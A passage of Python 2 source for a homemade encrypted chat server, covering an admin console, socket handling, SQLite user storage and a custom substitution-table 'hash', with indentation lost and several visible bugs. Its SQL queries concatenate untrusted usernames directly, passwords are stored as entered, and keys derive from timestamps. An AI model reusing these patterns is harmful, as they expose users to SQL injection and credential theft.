f.write(configcont)
f.close()
print "Please edit crsconfig.txt"
sys.exit()
def console(q, errors, motd):
if __name__ == '__main__':
prompt = consoleprompt()
prompt.prompt = '> '
prompt.cmdloop('Starting prompt...')
class consoleprompt(Cmd):
def do_say(self, args):
if args == "" or args == " ":
print "say messagetosay\nor\nsay Message to say"
else:
curtime = str(int(time.time()))
curmes = mesg.get()
if curmes.split(":")[0] == curtime:
mesg.put(curmes)
else:
db = q.get()
db[1].append("OP" + ":" + args)
q.put(db)
mesg.put(curtime + ":" + "OP" + ":" + args)
def do_printdb(self, args):
global q
self.quit = quit
db = q.get()
q.put(db)
tick = 0
for line in db:
for lin in line:
if tick == 0:
for li in lin:
print li
tick = 1
else:
print lin
def do_online(self, args):
global online
on = online.get()
online.put(on)
print "Online:"
for username in on:
print username
def do_printerrors(self, args):
global errors
erlist = errors.get()
errors.put(erlist)
print "Errors:"
for error in erlist:
print error
def do_motd(self, args):
if "-c" in args:
global motd
oldmotd = motd.get()
motd.put(args[3:])
print "motd changed from " + oldmotd + " to " + args[3:]
else:
print "add -c newcmd"
def do_quit(self, args):
global quit
print "Quitting.\33[97m"
quit.get()
quit.put("quitting:")
time.sleep(2)
os._exit(0)
def do_printdatabase(self, args):
conn = sqlite3.connect(dbdir)
c = conn.cursor()
print "Under Development"
def do_adduser(self, args):
if args == "":
print "adduser username"
print "password prompt will pop up once you run the command."
else:
global dbdir
conn = sqlite3.connect(dbdir)
c = conn.cursor()
c.execute("SELECT EXISTS(SELECT 1 FROM userbase WHERE username='" + args + "' LIMIT 1)")
if int(c.fetchall()[0][0]) == 1:
print "Username already used"
else:
c.execute("SELECT MAX(id) FROM userbase")
maxid = int(c.fetchall()[0][0])
c.execute("insert into userbase values('" + args + "', '" + getpass.getpass() + "', '" + str(maxid + 1) + "');")
conn.commit()
class Server(object):
def __init__(self, host, port, q, motd, errors, mesg, quit, online, conn, c):
self.c = c
self.conn = conn
self.motd = motd
self.quit = quit
self.errors = errors
self.host = host
self.port = port
self.q = q
self.mesg = mesg
self.online = online
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
def listen(self):
self.sock.listen(5)
while True:
try:
client, address = self.sock.accept()
client.settimeout(60)
threading.Thread(target = self.listenToClient,args = (client,address)).start()
except:
pass
def listenToClient(self, client, address):
global cv, now, dbdir
conn = sqlite3.connect(dbdir)
c = conn.cursor()
rcv = client.recv(128)
if str(cv) != str(rcv[3:]) and "cv:" in rcv and rcv != "screen:":
client.send("comp:0:" + str(cv))
error = self.errors.get()
error.append("Error client is wrong version")
self.errors.put(error)
kill1 = 1
else:
client.send("comp:1")
client.recv(1024)
client.send("ping")
time2 = int(round(time.time()*1000))
client.recv(1024)
time3 = int(round(time.time()*1000))
keytime = str(time.time())
hm = now.strftime("%H%M")
if time2 - time3 > 250:
error = self.errors.get()
error.append("Error ping is longer than 250 ms.")
self.errors.put(error)
client.send("ptl:250")
kill1 = 1
else:
pass
if len(keytime) < 32:
add = 32 - len(keytime)
key = str(keytime)
for num in range(add):
key = key + "#"
else:
pass
encrypt = AESCipher(key)
usern = encrypt.decrypt(client.recv(1024))
uget = "SELECT username FROM userbase WHERE username = '" + usern + "';"
c.execute(uget)
users = c.fetchall()
ucheck = 0
for user in users:
if str(user[0]) == usern:
c.execute("SELECT username,yash,id FROM userbase WHERE username = '" + usern + "';")
userbase = c.fetchone()
else:
pass
#userbase =
kill = 0
try:
if userbase:
client.send(encrypt.encrypt("succ:sendek"))
else:
kill = 1
except:
client.send(encrypt.encrypt("err:nousername"))
client.close()
kill = 1
kill1 = 0
if kill == 0:
encrypt = AESCipher(yash(str(userbase[1])) + hm)
syncmessage = encrypt.decrypt(client.recv(1024))
if len(syncmessage) == 10:
try:
int(syncmessage)
except:
client.send("kill:wpass")
#kill Connection
kill1 = 1
else:
client.send("kill:wpass")
#kill Connection
client.close()
kill1 = 1
if kill1 == 0:
client.send(encrypt.encrypt("pass:excepted"))
c.execute("insert into logs values('" + str(int(userbase[2])) + "', '" + str(userbase[0]) + " has logged in..." + "', '" + str(now.strftime("%Y:%M:%D:%H:%M:%S")) + "');")
else:
c.execute("insert into logs values('" + str(int(userbase[2])) + "', '" + str(userbase[0]) + " failed to login with on IP:" + str(address[0]) + "', '" + str(now.strftime("%Y:%M:%D:%H:%M:%S")) + "');")
conn.commit()
else:
rcv = "cv:n/a"
if kill1 == 1:
pass
elif str(cv) != rcv[3:] and "cv:" in rcv:
pass
elif rcv == "screen:":
online = self.online.get()
self.online.put(online)
client.send(encrypt.encrypt(str(online)))
cmessage = self.mesg.get()
self.mesg.put(cmessage)
lm = cmessage
tick = 0
qi = False
try:
while qi == False:
cmessage = self.mesg.get()
self.mesg.put(cmessage)
online = self.online.get()
self.online.put(online)
if cmessage != lm:
csend = cmessage.split(":")
client.send(encrypt.encrypt(csend[1] + ":" + csend[2]))
lm = cmessage
else:
pass
quit = self.quit.get()
self.quit.put(quit)
if tick == 1000:
client.send(encrypt.encrypt("online:" + str(online)))
onlinecheck = encrypt.decrypt(client.recv(1024))
if onlinecheck == "quitting:":
quit = "quitting:"
qi = True
else:
pass
tick = 0
else:
pass
tick = tick + 1
if quit == "quitting:":
client.send(encrypt.encrypt("quitting:"))
client.close()
qi = True
else:
pass
time.sleep(.001)
except:
error = self.errors.get()
error.append("A screen raised an error")
self.errors.put(error)
pass
else:
client.send(encrypt.encrypt("comp:1"))
name = encrypt.decrypt(client.recv(1024))
if "user:" not in name:
client.send(encrypt.encrypt("error:wrong type of packet received. 'user:' was not within the packet"))
erlist = errors.get()
erlist.append(str(client.getpeername() + ":wrong type of packet received. 'user:' was not within the packet"))
errors.put(erlist)
else:
name = name[5:]
used = False
online = self.online.get()
self.online.put(online)
for user in online:
if user == name:
used = True
else:
pass
if used == True:
client.send(encrypt.encrypt("error:Username has already been used before."))
client.close()
erlist = errors.get()
erlist.append(str(name + ":" + name + ":Username has already been used before."))
errors.put(erlist)
check = False
else:
client.send(encrypt.encrypt("user:" + name))
check = True
if check == True:
db = q.get()
q.put(db)
leng = 1
for nam in db[0]:
if name in nam:
nl = leng
else:
leng = leng
if 'nl' in locals():
db[0][nl - 1].append(address)
else:
nl = leng
db.append([name,])
db[0].append([name, address])
q.get()
q.put(db)
try:
online = self.online.get()
online.append(name)
self.online.put(online)
warntim = 0
while True:
rmesg = encrypt.decrypt(client.recv(1024))
if "" == rmesg:
pass
elif "/help" == rmesg:
pass
elif "quitting:" == rmesg:
on = online.get()
on.remove(name)
online.put(on)
elif "ping:" == rmesg:
pass
elif "m3ssg::" in rmesg:
curtime = str(int(time.time()))
curmes = self.mesg.get()
if curmes.split(":")[0] == curtime:
self.mesg.put(curmes)
warntim = warntim + 1
if warntim == 100:
client.close()
else:
pass
else:
db = q.get()
db[leng].append(name + ":" + rmesg[7:])
q.put(db)
self.mesg.put(curtime + ":" + name + ":" + rmesg[7:])
else:
print "add this to log errors. unknown packet"
print rmesg
except:
online = self.online.get()
if name in online:
online.remove(name)
else:
pass
self.online.put(online)
else:
pass
def writeoutput(q, errors):
if os.path.isdir("./logs") == False:
subprocess.Popen(['mkdir', './logs'], stdout=subprocess.PIPE,).communicate()[0]
else:
pass
tim = str(datetime.datetime.now())
tim = tim.replace(" ", "")
log = "./logs/log" + tim + ".txt"
while True:
try:
time.sleep(10)
tta = q.get()
q.put(tta)
error = errors.get()
errors.put(error)
fw = "Users:\n"
errs = ""
for err in error:
errs = errs + err + "\n"
for line in tta:
for lin in line:
fw = fw + str(lin) + "\n"
fw = fw + "═════════════════════════════════════════════════════════\nErrors:\n" + errs
f = open(log, 'w')
f.write(fw)
f.close()
except:
error = errors.get()
error.append("Error while writing output\n")
errors.put(error)
#Added in Chat Room 2.0
if os.path.isfile(dbdir) == True:
dbexist = 1
else:
dbexist = 0
now = datetime.datetime.now()
conn = sqlite3.connect(dbdir)
c = conn.cursor()
if dbexist == 1:
pass
else:
print "Initializing database..."
time.sleep(1)
print "Please put a new username and password into the database..."
good = False
while good == False:
usern = raw_input("username:")
passw = getpass.getpass()
tmp = raw_input("Are you sure thats correct?(Y/N)")
if tmp == "y" or tmp == "Y" or tmp == "ye" or tmp == "YE" or tmp == "YES" or tmp == "Yes" or tmp == "YEs" or tmp == "yes" or tmp == "" or tmp == " ":
good = True
else:
pass
c.execute("CREATE TABLE userbase (username real, yash real, id real);")
c.execute("CREATE TABLE logs (id real, message real, timestamp real);")
c.execute("insert into userbase values('" + usern + "', '" + passw + "', '1');")
conn.commit()
def yash(inp):
try:
partial = inp + 1
print "Error this is not a string"
sys.exit()
except:
pass
tick = 0
hexlists = [
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '26', '27', '28', '29', '20', '2a', '2b', '2c', '2d', '2e', '2f', '31', '32', '33', '34', '35', '36', '37', '38', '39', '30', '3a', '3b', '3c', '3d', '3e', '3f', '41', '42', '49', '21', '22', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '52', '53', '72', '73', '74', '75', '76', '77', '54', '55', '56', '57', '58', '59', '50', '5a', '5b', '5c', '5d', '5e', '5f', '61', '62', '63', '64', '43', '44', '45', '46', '47', '48', '65', '66', '67', '68', '69', '60', '6a', '6b', '6c', '6d', '6e', '6f', '71', '78', '79', '70', '7a', '7b', '7c', '7d', '7e', '7f'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '37', '38', '39', '30', '3a', '6e', '6f', '71', '78', '79', '26', '27', '28', '29', '70', '7a', '7b', '7c', '7d', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '2f', '31', '32', '3b', '3c', '3d', '3e', '3f', '41', '42', '49', '21', '22', '5c', '5d', '5e', '5f', '61', '62', '63', '64', '43', '44', '45', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '52', '53', '72', '73', '74', '75', '76', '77', '54', '55', '56', '57', '58', '59', '50', '5a', '5b', '46', '47', '48', '65', '66', '67', '68', '69', '60', '6a', '6b', '6c', '6d', '33', '34', '35', '36'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '50', '5a', '5b', '46', '47', '48', '65', '66', '67', '68', '69', '60', '6a', '6b', '6c', '6d', '33', '34', '35', '36', '37', '38', '26', '27', '28', '29', '70', '7a', '7b', '7c', '7d', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '2f', '31', '32', '3b', '3c', '3d', '61', '62', '63', '64', '43', '44', '45', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '52', '53', '72', '73', '74', '75', '76', '77', '54', '55', '56', '57', '58', '59', '39', '30', '3a', '6e', '6f', '71', '78', '79', '3e', '3f', '41', '42', '49', '21', '22', '5c', '5d', '5e', '5f'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '7f', '20', '2a', '2b', '2c', '2d', '2e', '2f', '31', '32', '3b', '3c', '3d', '61', '62', '63', '64', '43', '44', '45', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '52', '53', '72', '73', '74', '75', '76', '77', '54', '55', '5d', '5e', '5f', '56', '57', '58', '59', '39', '30', '3a', '6e', '6f', '71', '78', '79', '3e', '3f', '41', '42', '49', '21', '22', '5c', '48', '65', '66', '67', '68', '69', '60', '6a', '6b', '6c', '6d', '33', '34', '35', '36', '37', '38', '26', '50', '5a', '5b', '46', '47', '27', '28', '29', '70', '7a', '7b', '7c', '7d', '7e'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '79', '3e', '3f', '41', '42', '49', '21', '22', '5c', '48', '65', '66', '67', '68', '69', '60', '6a', '6b', '6c', '6d', '74', '75', '76', '77', '54', '55', '5d', '33', '34', '35', '36', '50', '5a', '5b', '46', '47', '27', '28', '29', '70', '7a', '7b', '7c', '7d', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '2f', '31', '32', '3b', '3c', '3d', '61', '62', '63', '64', '43', '44', '45', '3a', '6e', '6f', '71', '78', '37', '38', '26', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '52', '53', '72', '73', '5e', '5f', '56', '57', '58', '59', '39', '30'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '52', '53', '72', '73', '5e', '5f', '65', '66', '67', '68', '69', '60', '6a', '6b', '6c', '6d', '74', '75', '76', '77', '54', '55', '5d', '33', '34', '35', '36', '50', '5a', '5b', '46', '47', '27', '28', '29', '70', '7a', '7b', '7c', '7d', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '2f', '31', '32', '3b', '3c', '3d', '61', '62', '63', '64', '43', '44', '45', '56', '57', '58', '59', '39', '30', '3a', '6e', '6f', '71', '78', '37', '38', '26', '79', '3e', '3f', '41', '42', '49', '21', '22', '5c'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '79', '3e', '3f', '41', '42', '49', '21', '22', '5c', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '52', '53', '72', '73', '5e', '5f', '65', '66', '67', '32', '3b', '3c', '3d', '61', '62', '63', '64', '43', '44', '45', '56', '57', '68', '69', '60', '6a', '6b', '6c', '6d', '74', '75', '76', '77', '54', '55', '5d', '33', '34', '35', '36', '50', '5a', '31', '58', '59', '39', '30', '3a', '6e', '6f', '71', '78', '37', '38', '26', '5b', '46', '47', '27', '28', '29', '70', '7a', '7b', '7c', '7d', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '2f'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '79', '3e', '3f', '41', '42', '49', '21', '22', '5c', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '52', '53', '72', '73', '5e', '5f', '65', '66', '67', '32', '3b', '3c', '3d', '61', '62', '63', '7b', '7c', '7d', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '2f', '31', '58', '59', '39', '30', '3a', '6e', '6f', '71', '64', '43', '44', '45', '56', '57', '68', '69', '60', '6a', '6b', '6c', '6d', '74', '75', '76', '77', '54', '55', '5d', '33', '34', '35', '36', '50', '5a', '5b', '46', '47', '27', '28', '29', '70', '7a', '78', '37', '38', '26'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '79', '3e', '3f', '41', '5d', '33', '34', '35', '36', '50', '5a', '5b', '46', '47', '27', '28', '29', '70', '7a', '78', '37', '38', '26', '42', '49', '21', '22', '5c', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '2f', '31', '58', '59', '39', '30', '3a', '6e', '6f', '71', '64', '43', '44', '45', '56', '57', '68', '69', '60', '6a', '6b', '6c', '6d', '74', '75', '76', '77', '54', '55', '52', '53', '72', '73', '5e', '5f', '65', '66', '67', '32', '3b', '3c', '3d', '61'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '29', '70', '7a', '78', '37', '38', '26', '42', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '57', '68', '69', '60', '79', '3e', '3f', '41', '5d', '33', '34', '35', '36', '50', '5a', '5b', '46', '47', '27', '28', '6a', '6b', '6c', '6d', '74', '75', '76', '77', '54', '55', '52', '53', '72', '73', '5e', '5f', '65', '66', '67', '32', '3b', '3c', '3d', '61', '2f', '31', '58', '59', '39', '30', '3a', '6e', '6f', '71', '64', '43', '44', '45', '56', '49', '21', '22', '5c', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '56', '49', '21', '22', '5c', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '46', '47', '27', '28', '6a', '29', '70', '7a', '78', '37', '38', '26', '42', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '57', '68', '69', '60', '79', '3e', '3f', '41', '5d', '33', '3c', '3d', '61', '2f', '31', '58', '59', '39', '30', '3a', '6e', '6f', '71', '64', '43', '44', '45', '6b', '6c', '6d', '74', '75', '76', '77', '54', '55', '52', '53', '72', '73', '5e', '5f', '65', '66', '67', '32', '3b'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '46', '47', '27', '28', '6a', '29', '70', '7a', '78', '37', '38', '26', '42', '7e', '7f', '20', '2a', '3a', '6e', '6f', '71', '64', '43', '44', '45', '6b', '6c', '6d', '74', '75', '76', '56', '49', '21', '22', '5c', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '55', '52', '53', '72', '73', '5e', '5f', '65', '66', '67', '32', '3b', '2b', '2c', '2d', '2e', '57', '68', '69', '60', '79', '3e', '3f', '41', '5d', '33', '3c', '3d', '61', '2f', '31', '58', '59', '39', '30'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '7f', '20', '2a', '3a', '6e', '6f', '71', '64', '43', '44', '45', '6b', '6c', '6d', '74', '75', '76', '56', '49', '79', '3e', '3f', '41', '5d', '33', '3c', '3d', '61', '2f', '31', '58', '59', '39', '30', '21', '22', '5c', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '55', '52', '53', '72', '73', '5e', '5f', '65', '66', '67', '32', '3b', '2b', '2c', '2d', '2e', '57', '68', '69', '60', '46', '47', '27', '28', '6a', '29', '70', '7a', '78', '37', '38', '26', '42', '7e'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '49', '79', '3e', '3f', '41', '5d', '33', '3c', '3d', '61', '2f', '31', '58', '59', '39', '30', '21', '22', '5c', '67', '32', '3b', '2b', '2c', '2d', '2e', '57', '68', '69', '60', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '55', '52', '53', '72', '73', '5e', '5f', '65', '66', '46', '47', '27', '28', '6a', '29', '70', '7a', '78', '37', '38', '26', '42', '7e', '7f', '20', '2a', '3a', '6e', '6f', '71', '64', '43', '44', '45', '6b', '6c', '6d', '74', '75', '76', '56'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '39', '30', '21', '22', '5c', '67', '32', '3b', '2b', '2c', '2d', '2e', '57', '68', '69', '60', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '55', '6d', '74', '75', '76', '49', '79', '3e', '3f', '41', '5d', '33', '3c', '3d', '61', '2f', '31', '58', '59', '56', '52', '53', '72', '73', '5e', '5f', '65', '66', '46', '47', '27', '28', '6a', '29', '70', '7a', '78', '37', '38', '26', '42', '7e', '7f', '20', '2a', '3a', '6e', '6f', '71', '64', '43', '44', '45', '6b', '6c'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '4c', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '55', '6d', '74', '75', '76', '49', '79', '3e', '3f', '41', '5d', '7e', '7f', '20', '2a', '3a', '6e', '6f', '71', '64', '43', '44', '45', '6b', '6c', '33', '3c', '39', '30', '21', '22', '5c', '67', '32', '3b', '2b', '2c', '2d', '2e', '57', '68', '69', '60', '48', '23', '24', '25', '40', '4a', '4b', '3d', '61', '2f', '31', '58', '59', '56', '52', '53', '72', '73', '5e', '5f', '65', '66', '46', '47', '27', '28', '6a', '29', '70', '7a', '78', '37', '38', '26', '42'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '28', '6a', '29', '70', '7a', '78', '37', '38', '26', '42', '46', '4c', '55', '6d', '74', '75', '76', '49', '79', '3e', '3f', '41', '5d', '7e', '7f', '20', '2a', '3a', '6e', '6f', '71', '64', '43', '44', '45', '6b', '6c', '33', '3c', '39', '30', '21', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '22', '5c', '67', '32', '3b', '2b', '2c', '2d', '2e', '57', '68', '69', '60', '48', '23', '24', '25', '40', '4a', '4b', '3d', '61', '2f', '31', '58', '59', '56', '52', '53', '72', '73', '5e', '5f', '65', '66', '47', '27'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '25', '40', '4a', '3f', '41', '5d', '7e', '7f', '20', '2a', '3a', '6e', '6f', '71', '64', '43', '44', '45', '6b', '6c', '33', '3c', '39', '30', '21', '4d', '4c', '55', '6d', '74', '75', '76', '49', '79', '3e', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '22', '5c', '67', '32', '3b', '2b', '2c', '2d', '69', '60', '48', '23', '24', '4b', '3d', '61', '2f', '31', '58', '59', '56', '52', '53', '72', '38', '26', '42', '73', '5e', '66', '47', '27', '28', '6a', '29', '70', '7a', '78', '37', '46', '5f', '65', '2e', '57', '68'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '64', '43', '44', '45', '6b', '6c', '33', '3c', '39', '30', '21', '4d', '4c', '70', '7a', '78', '37', '46', '5f', '65', '2e', '57', '68', '55', '6d', '74', '75', '76', '49', '25', '40', '4a', '3f', '41', '5d', '7e', '7f', '20', '2a', '3a', '6e', '6f', '71', '79', '3e', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '22', '5c', '67', '32', '3b', '2b', '2c', '2d', '69', '60', '48', '23', '24', '4b', '3d', '61', '2f', '31', '58', '59', '56', '52', '53', '72', '38', '26', '42', '73', '5e', '66', '47', '27', '28', '6a', '29'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '3c', '39', '30', '21', '4d', '4c', '70', '7a', '78', '37', '46', '5f', '65', '2e', '57', '68', '55', '6d', '74', '75', '76', '49', '25', '40', '4a', '3f', '41', '5d', '7e', '7f', '20', '2a', '3a', '6e', '6f', '71', '79', '3e', '4e', '4f', '51', '62', '63', '7b', '7c', '52', '53', '72', '38', '26', '42', '73', '5e', '64', '43', '44', '45', '6b', '6c', '33', '66', '47', '27', '28', '6a', '29', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '22', '5c', '67', '32', '3b', '2b', '2c', '2d', '69', '60', '48', '23', '24', '4b', '3d', '61', '2f', '31', '58', '59', '56'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '60', '48', '23', '24', '4b', '3d', '61', '2f', '31', '58', '59', '56', '7f', '20', '2a', '3a', '6e', '6f', '71', '79', '3e', '57', '68', '55', '6d', '74', '75', '76', '49', '25', '40', '4a', '3f', '41', '5d', '7e', '2d', '69', '4e', '4f', '51', '62', '63', '7b', '7c', '52', '53', '72', '38', '26', '42', '73', '5e', '3c', '39', '30', '21', '4d', '4c', '70', '7a', '78', '37', '46', '5f', '65', '2e', '64', '43', '44', '45', '6b', '6c', '33', '66', '47', '27', '28', '6a', '29', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '22', '5c', '67', '32', '3b', '2b', '2c'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '20', '28', '6f', '71', '78', '38', '79', '6c', '29', '70', '7b', '26', '7a', '27', '7c', '7d', '7e', '7f', '2a', '2b', '2c', '2d', '2e', '2f', '31', '32', '3b', '3c', '3d', '3e', '3f', '41', '42', '49', '21', '63', '64', '43', '44', '45', '23', '24', '25', '40', '4a', '66', '67', '22', '5c', '5d', '5e', '5f', '61', '62', '68', '69', '60', '4b', '4c', '6a', '6b', '4d', '4e', '4f', '51', '52', '53', '72', '73', '74', '75', '76', '77', '54', '55', '56', '57', '58', '59', '50', '5a', '5b', '46', '47', '48', '65', '6d', '33', '34', '35', '36', '37', '39', '30', '3a', '6e'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '27', '7c', '7d', '7e', '7f', '2a', '59', '50', '5a', '5b', '46', '47', '48', '65', '6d', '33', '34', '35', '36', '37', '39', '30', '3a', '6e', '2b', '2c', '2d', '2e', '2f', '31', '32', '3b', '3c', '3d', '3e', '3f', '41', '42', '49', '21', '63', '64', '43', '44', '45', '23', '24', '25', '40', '4a', '66', '67', '22', '5c', '5d', '5e', '5f', '61', '62', '68', '69', '60', '4b', '4c', '6a', '6b', '4d', '4e', '4f', '51', '20', '28', '6f', '71', '78', '38', '79', '6c', '29', '70', '7b', '26', '7a', '52', '53', '72', '73', '74', '75', '76', '77', '54', '55', '56', '57', '58'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '48', '34', '7c', '27', '7d', '65', '6d', '33', '7e', '47', '35', '7f', '37', '39', '6e', '2b', '2c', '2d', '2e', '2f', '31', '3b', '3f', '41', '3c', '3d', '3e', '42', '49', '21', '63', '64', '43', '44', '45', '23', '24', '25', '40', '4a', '66', '67', '22', '5c', '5f', '61', '5d', '5e', '69', '60', '4b', '4c', '6a', '6b', '4d', '4e', '4f', '51', '62', '68', '20', '28', '6f', '71', '74', '75', '38', '79', '6c', '29', '70', '7b', '26', '7a', '52', '76', '78', '77', '54', '55', '56', '57', '58', '53', '72', '73', '2a', '59', '50', '5a', '5b', '46', '32', '30', '3a', '36'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '2f', '31', '3b', '3f', '41', '3c', '3d', '3e', '42', '5b', '46', '32', '30', '3a', '36', '35', '7f', '37', '39', '6e', '2b', '2c', '2d', '2e', '49', '21', '63', '64', '43', '44', '45', '23', '24', '25', '40', '4a', '66', '67', '22', '5c', '5f', '61', '5d', '5e', '69', '60', '4b', '4c', '6a', '6b', '4d', '4e', '4f', '51', '62', '68', '20', '28', '6f', '71', '74', '75', '38', '79', '6c', '29', '70', '7b', '26', '73', '2a', '59', '50', '5a', '7a', '52', '76', '78', '77', '54', '55', '56', '57', '27', '7d', '65', '6d', '33', '7e', '47', '58', '53', '72', '48', '34', '7c'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '5b', '46', '32', '30', '3a', '36', '35', '7f', '37', '39', '6e', '2b', '2c', '2d', '2e', '2f', '31', '3b', '3f', '41', '3c', '3d', '3e', '42', '49', '21', '63', '64', '43', '44', '45', '23', '24', '25', '40', '4a', '66', '67', '22', '5c', '5f', '61', '5d', '5e', '69', '60', '4b', '4c', '6a', '6b', '4d', '4e', '4f', '51', '62', '68', '20', '28', '6f', '71', '74', '77', '54', '78', '56', '48', '34', '7c', '55', '75', '38', '79', '6c', '29', '70', '7b', '26', '73', '2a', '59', '50', '5a', '7a', '52', '76', '27', '7d', '65', '6d', '33', '7e', '47', '57', '58', '53', '72'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '39', '6e', '2b', '5b', '46', '32', '30', '3a', '36', '35', '7f', '37', '64', '43', '2d', '2e', '2f', '2c', '42', '49', '21', '63', '31', '3b', '3f', '41', '3c', '3d', '3e', '44', '5a', '7a', '52', '76', '27', '7d', '65', '6d', '33', '7e', '47', '57', '45', '23', '4c', '6a', '24', '25', '40', '4a', '66', '67', '22', '5c', '5f', '61', '5d', '5e', '69', '60', '4b', '6b', '7c', '55', '75', '38', '79', '6c', '29', '70', '7b', '26', '73', '2a', '59', '50', '4d', '68', '20', '28', '6f', '71', '74', '4e', '4f', '51', '62', '77', '54', '78', '56', '48', '58', '53', '72', '34'],
